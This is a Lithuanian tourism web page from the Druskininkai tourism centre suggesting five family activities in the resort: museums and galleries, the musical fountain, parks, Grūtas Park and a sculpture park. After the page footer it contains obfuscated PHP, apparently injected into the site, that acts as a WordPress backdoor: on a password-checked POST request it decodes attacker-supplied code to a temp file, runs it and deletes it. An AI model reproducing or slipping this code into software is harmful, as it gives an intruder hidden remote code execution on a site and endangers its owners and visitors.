fbpx
A A
A A

TOP 5 idėjos, ką veikti Druskininkuose su vaikais

2021.11.04

Ieškote patarimų ką veikti ir kur saugiai bei turiningai praleisti laiką su visa šeima? Jūsų dėmesiui – 5 idėjos, kurias galite išbandyti Druskininkų kurorte.

Perskyrimas

Įkvepiantys kūrybai Druskininkai: muziejai ir galerijos

Druskininkų miesto muziejus

Orai savaitgalį nesuspėjami, tačiau lietus tikrai nesustabdys, jei su visa šeima leisitės pažinti Druskininkų istorijos paslaptis bei šiuolaikinį meną muziejuose ir galerijose. Šiuo metu kurorte vyksta unikalios parodos, kuriose surasite kūrybinį įkvėpimą, išskirtinius tapybos darbus ir fotografijas.

Druskininkų miesto muziejus ir galerija taip pat laukia lankytojų – turite galimybę pamatyti unikalią kurorto istorijos ekspoziciją gyvai. Kai apsilankysite viloje „Linksma“ įsikūrusiame muziejuje, nepraleiskite progos palypėti aukščiau į vilos bokštelį ir pasigrožėti unikalia Druskininkų panorama.

Amatų centras „Menų kalvė‟ – universali kūrybinė erdvė, kurioje po vienu stogu atvirose dirbtuvėse susibūrė ir profesionalūs dailininkai, ir tautodailininkai, o visi norintieji iš arti gali pamatyti jų veiklą. Amatų centre nuolat eksponuojamos menininkų kūrybos darbų parodos, vyksta kūrybinės stovyklos, meninės akcijos, plenerai, taip pat čia galima įsigyti rankų darbo gaminių bei autorinių meno kūrinių.

Druskininkuose, kurie yra tikras Čiurlionio miestas, galite apsilankyti M. K. Čiurlionio memorialiniame muziejuje, kuris įkurtas 1963 m. dailininko ir kompozitoriaus tėvų namuose. Gyvendamas Druskininkuose, jaunasis M. K. Čiurlionis nutapė vieną poetiškiausių savo serijų – „Žvaigždžių sonatą“. Juose menininkas dažnai apsistodavo 1890–1911 m. Muziejuje atkurta autentiška to laikotarpio gyvenamoji aplinka. Muziejus dirba ir sekmadienį!

Lietuvos grafikas, tapytojas, skulptorius, vitražų kūrėjas, vienas iškiliausių XX a. lietuvių menininkų Vytautas Kazimieras Jonynas ilgą laiką gyveno ir kūrė Druskininkuose bei parsivežė čia daugumą savo darbų, sukurtų užsienio šalyse. Bene didžiausią jų dalį rasite būtent V. K. Jonyno galerijoje-namuose, esančiuose Druskonio ežero ir M. K. Čiurlionio memorialinio muziejaus pašonėje. Galerija dirba ir sekmadienį!

Perskyrimas

Muzikinis fontanas

Muzikinis fontanas Druskininkuose

Gražiausias Lietuvoje muzikinis fontanas pasirengęs užburti muzikos, čiurlenimo ir šviesų šou. Pačiame Druskininkų centre, Gydyklų parke jau nuo 2011 metų veikiantis muzikinis fontanas yra viena mėgstamiausių vietinių ir miesto svečių vietų. 2019 metais jis pelnė gražiausio Lietuvos fontano titulą.

Šalia fontano, dideliam vaikų džiaugsmui, rasite sūpynes, kviečiančias smagiai pasisupti užburiančio fontano šokio metu.

Kiekvienas norintis trumpąja SMS žinute gali užsakyti savo mėgstamą melodiją, pasirinkdamas ją iš ilgo suprogramuotų fontano melodijų sąrašo.

 

Perskyrimas

Kurorto parkai ir žaidimų aikštelės

Karolio Dineikos sveikatingumo parkas

Turintys vaikų žino, kad parkai ir žaidimų aikštelės yra vienas iš svarbiausių mažiesiems dalykų, kad ir kokiame mieste apsilankytumėte! Druskininkuose mažieji šeimos nariai tikrai nenusivils – kurorte įrengtose žaidimų aikštelėse ir sūpynėse laukia daug smagių akimirkų.

Karolio Dineikos sveikatingumo parkas – ypatingas šeimos parkas, tikras Druskininkų perlas, į kurį sudėtos šimtametės sveikatingumo tradicijos. Tai gamtos kampelis, svajojantiems ištrūkti iš miesto. Jauniesiems lankytojams neteks nuobodžiauti, nes parke įrengta kurorto vietinių ir svečių pamėgta laipiojimo ir žaidimų aikštelė, o paaugliai čia gali pažaisti tinklinį arba stalo tenisą.

Perskyrimas

  Grūto parkas – bus ką veikti ir mažiems, ir dideliems

Šalia Druskininkų esančiame Grūto kaime yra įsikūręs vienintelis Lietuvoje tokio pobūdžio teminis Grūto parkas. Parke eksponuojami sunkaus Lietuvai sovietinio laikotarpio simboliai, monumentalistika ir įrengta ekspozicija – unikalus reiškinys pasaulyje.  Po atviru dangumi įrengta demontuotų sovietmečio paminklų ekspozicija atskleidžia to laikotarpio dvasią ir padeda pažinti praeitį.

Mažiesiems parko lankytojams įrengtas mini zoologijos sodas. Pačios įvairiausios sūpynės ir karstynės leis sugrįžti į vaikystę ir tėvams.

Daugiau informacijos – grutoparkas.lt

KAINOS
KONTAKTAI

Perskyrimas

A. Česnulio skulptūrų ir poilsio parke – atradimai visai šeimai

Antano Česnulio skulptūrų ir poilsio parkas

Apsilankymas Antano Česnulio skulptūrų parke – puiki pramoga visai šeimai.  Sodyba įsikūrusi vos už kelių kilometrų už Druskininkų esančiame Naujasodės kaime, vaizdingoje vietoje ant Ratnyčėlės upelio kranto. Antanas Česnulis – vienas garsiausių Dzūkijos skulptorių, per 40 savo kūrybos metų sukūręs daugybę kūrinių iš medžio.

Pasivaikščiokite tarp įspūdingų medžio skulptūrų, kurias autorius sukūrė savo rankomis. Čia pamatysite ir malūną, ir Rūpintojėlių sieną, ir tautosakos personažus. Parką puošia vaizdingi Ratnyčėlės upelio vingiai. Sodyba nuolat papildoma naujais skulptoriaus darbais, todėl kiekvieną kartą atvykę atrasite naujas, dar nematytas skulptūras.

Visi Antano Česnulio darbai yra unikalūs, skirtingi, gyvybingi. Jo skulptūros, stogastulpiai, koplytstulpiai stovi įvairiose Lietuvos vietose bei užsienyje, o kūriniai eksponuoti daugelyje pasaulio šalių. 

Daugiau informacijos – cesnuliusodyba.lt

Adresas: Naujasodės g. 16, Naujasodės km., Druskininkai

Telefonas: 8 687 93694

Perskyrimas

Parengė Druskininkų turizmo ir verslo informacijos centras

Visit Druskininkai
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}